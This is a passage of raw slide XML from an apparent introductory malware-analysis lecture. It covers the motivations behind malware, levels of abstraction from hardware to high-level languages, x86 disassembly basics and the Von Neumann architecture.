              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>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Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370"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Level of Abstraction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724000" y="2421000"/>
            <a:ext cx="2425680" cy="1295640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723280" y="2679480"/>
            <a:ext cx="1590120" cy="146268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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>move ebp, esp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>sub esp, 0x40</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187640" y="2421000"/>
            <a:ext cx="2425680" cy="1295640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186920" y="2679480"/>
            <a:ext cx="2426400" cy="118836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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int c;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf(“Hello World\n”);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return 0;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543120" y="4829040"/>
            <a:ext cx="2425680" cy="1295640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071960" y="5055480"/>
            <a:ext cx="999000" cy="118836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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>55</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>8B EC</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>8B EC 40</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389240" y="1737720"/>
            <a:ext cx="2022480" cy="91404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Malware writer</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High-level language</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996160" y="1737720"/>
            <a:ext cx="1978200" cy="118836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Malware analyst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Low-level language</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771720" y="4182840"/>
            <a:ext cx="1509840" cy="91404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CPU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Machine code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19312200">
            <a:off x="2433600" y="3896280"/>
            <a:ext cx="325800" cy="1583640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12970800">
            <a:off x="6687360" y="3832920"/>
            <a:ext cx="264600" cy="1583640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327680" y="4628520"/>
            <a:ext cx="103716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Complier</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875640" y="4686120"/>
            <a:ext cx="2242440" cy="91404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Disassembler</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(Reverse-Engineering)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Existence &amp; Motivation </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112"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Existence: perceived as the tool or the weapon of an individual, organization intending an unethical or illegal act concerning computers and data.</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Motivations:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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to wreck havoc: playing a prank, crash PCs, domain unavailable, etc.</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to gain profit: spam sending as a service, stealing financial or personal data, etc.</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Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="65000"/>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Level of Abstraction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Hardware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Physical; electronical circuits; logic gates (AND, OR, ..)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Firmware (microcode)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Only operates on the designed circuit</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Set of micro-instructions translated from high machine code level to interact with hardware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Machine code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Hexadecimal digits (Opcodes) generated when high-level language compiled.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Underlying hardware can execute (+ microcode)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Low-level languages</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Human-readable version of a computer architecture's instruction set (e.g. assembly language: mov, jmp, etc.)</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Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>High-level languages</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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C, C++</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Interpreted languages</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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C#, Perl,. NET, Java, Python</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It is NOT complied into machine-code, translated into Bytecode instead.</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Bytecode executes within an interpreter which translates bytecode into executables machine code on the fly at runtime.</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Reduce the dependence on hardware and OS. </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Can run on VM, e.g. JVM</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>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Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Google Shape;703;p72" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpreter"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="1149480"/>
            <a:ext cx="6903360" cy="2567160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;704;p72" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpreter"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348560" y="3964320"/>
            <a:ext cx="6886080" cy="270468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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393"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X86 Architecture </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Von Neumann architecture</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="394" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="972000" y="2294640"/>
            <a:ext cx="5101560" cy="4019400"/>
            <a:chOff x="972000" y="2294640"/>
            <a:chExt cx="5101560" cy="4019400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="395" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="972000" y="2366640"/>
              <a:ext cx="3600000" cy="2880000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="396" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1548000" y="2654640"/>
              <a:ext cx="2664000" cy="899640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1692720" y="4023360"/>
              <a:ext cx="1187640" cy="791640"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="398" name="CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3204360" y="4022640"/>
              <a:ext cx="1151640" cy="791640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5148360" y="2366640"/>
              <a:ext cx="791640" cy="2880000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="400" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="972000" y="5535000"/>
              <a:ext cx="3600000" cy="647640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="401" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299320" y="2919960"/>
              <a:ext cx="102564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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Registers</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="402" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2058120" y="4083120"/>
              <a:ext cx="55764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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>ALU</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="403" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3325320" y="4095720"/>
              <a:ext cx="972360" cy="64044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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Control Unit</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="404" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2331720" y="5674320"/>
              <a:ext cx="125388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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>I/O Devices</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="405" name="CustomShape 14"/>
            <p:cNvSpPr/>
